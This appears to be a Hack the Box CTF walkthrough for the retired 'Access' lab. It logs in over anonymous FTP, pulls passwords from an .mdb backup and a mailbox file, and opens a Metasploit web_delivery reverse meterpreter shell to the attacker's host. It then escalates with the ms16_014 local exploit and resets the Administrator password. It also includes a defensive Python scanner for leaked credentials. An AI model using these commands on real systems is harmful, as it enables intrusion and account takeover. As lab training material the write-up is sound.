Today we are going to solve another CTF challenge, “Access”. It is a retired vulnerable lab presented by Hack the Box to help pentesters practice online penetration testing according to their experience level; they have a collection of vulnerable labs as challenges, from beginner to expert level.
Task: To find the user.txt and root.txt files
Note: Since these labs are available online, they have a static IP. The IP of Access is 10.10.10.98.
Penetrating Methodologies:
· Network scanning (nmap).
· Logging in to FTP using anonymous login.
· Using strings to read the contents of the .mdb file.
· Unzipping the zip file using 7z.
· Using readpst to read the contents of the .pst file.
· Finding login credentials.
· Logging into Telnet.
· Finding the first flag, user.txt.
· Using the web delivery module to create PowerShell code.
· Getting Meterpreter.
· Using the exploit suggester of Metasploit.
· Getting root access.
· Changing the Administrator password using net user.
· Reading our final flag, root.txt.
Walkthrough
Let’s start off with scanning the network to find our target.
nmap -p- -A 10.10.10.98
The first thing that got our attention is that we have anonymous access to the FTP server. Let’s log in and see what we find.
After successfully logging into the FTP server, we enumerated the directories and downloaded two files, Access Control.zip and backup.mdb. They might come in handy later on.
ftp 10.10.10.98
When we tried to unzip the zip file, we found that it was password protected. So we tried to open the backup.mdb file and found a password to the zip file.
strings backup.mdb | grep access
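Seen from the defender's side, the same check can be run on a file before it is placed on a share that allows anonymous access. The following Python is an added example, not part of the original walkthrough: it extracts printable ASCII and UTF-16LE runs from a binary file and flags those containing credential-like keywords. The keyword list, function names and sample bytes are assumptions constructed for illustration.

```python
import re

# Assumed starting keyword list; tune it for your environment.
KEYWORDS = ("password", "passwd", "pwd", "secret", "access")
MIN_LEN = 4  # same default minimum run length as strings(1)

ASCII_RUN = re.compile(rb"[\x20-\x7e]{%d,}" % MIN_LEN)
# UTF-16LE text: a printable byte followed by NUL, repeated (what `strings -el` finds).
UTF16_RUN = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % MIN_LEN)


def extract_strings(data: bytes):
    """Yield (offset, encoding, text) for each printable run in data."""
    for m in ASCII_RUN.finditer(data):
        yield m.start(), "ascii", m.group().decode("ascii")
    for m in UTF16_RUN.finditer(data):
        yield m.start(), "utf-16le", m.group().decode("utf-16le")


def find_secret_hints(data: bytes, keywords=KEYWORDS):
    """Return findings, sorted by offset, whose text contains a keyword."""
    hits = []
    for offset, enc, text in extract_strings(data):
        lowered = text.lower()
        matched = [k for k in keywords if k in lowered]
        if matched:
            hits.append({"offset": offset, "encoding": enc,
                         "keywords": matched, "text": text})
    return sorted(hits, key=lambda h: h["offset"])


def audit_file(path):
    """Scan one file on disk, e.g. a backup staged for a shared location."""
    with open(path, "rb") as fh:
        return find_secret_hints(fh.read())


# Constructed sample: binary padding around one ASCII and one UTF-16LE string.
SAMPLE = (
    b"\x00\x01\x02Standard Jet DB\x00\xff\xfe"
    + b"example-access-value\x00\x07\x07"
    + "admin_password=Example123".encode("utf-16le")
    + b"\x00\x00\x9c\x10"
)

if __name__ == "__main__":
    for hit in find_secret_hints(SAMPLE):
        print(f"{hit['offset']:#06x} {hit['encoding']:8} {hit['keywords']} {hit['text']}")
```

Any hit means the file carries a readable secret and should not be published until that value is removed and rotated.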
Once we have obtained the password for Access Control.zip, it is time to unzip it. After unzipping, we saw it is a .pst file, which is a Microsoft Exchange format for mailboxes. Using readpst, we converted the file into .mbox format.
7z x Access\ Control.zip
readpst 'Access Control.pst'
Let’s read the contents of the Access Control.mbox.
less 'Access Control.mbox'
After reading the contents, we saw useful credentials that are surely going to help us move ahead.
Username- security
Password- 4Cc3ssC0ntr0ller
Let’s log in to telnet using our new credentials. After enumerating through the directories, we found our first flag.
telnet 10.10.10.98
dir
cd Desktop
type user.txt
Let’s create shell code generated via the web delivery module of Metasploit.
use exploit/multi/script/web_delivery
set target 2
set payload windows/x64/meterpreter/reverse_tcp
set lhost 10.10.14.6
exploit
Now we will execute the PowerShell code generated via the web delivery module. We have successfully got the meterpreter. Moving forward.
getuid
getsystem
sysinfo
After that, we used the exploit suggester, which gave us all the possible exploits for the operating system of the victim’s system.
use post/multi/recon/local_exploit_suggester
set session 1
exploit
Using the exploit ms16_014_wmi_recv_notif of Metasploit.
use exploit/windows/local/ms16_014_wmi_recv_notif
set lhost 10.10.14.6
set session 1
set lport 1234
exploit
Oh yeah! We have got root access.
whoami
We looked for our final flag but couldn’t find it. Instead, we changed the password for Administrator because we can use it to log in via telnet.
net user
net user Administrator Ignite@123
Here we successfully logged in via Telnet and found our final flag.
telnet 10.10.10.98
login: administrator
password: Ignite@123
cd Desktop
type root.txt
Author: Ashray Gupta is a Security Researcher and Technical Writer at Hacking Articles, contributing his 2 years in the field of security as a Penetration Tester and Forensic Computer Analyst.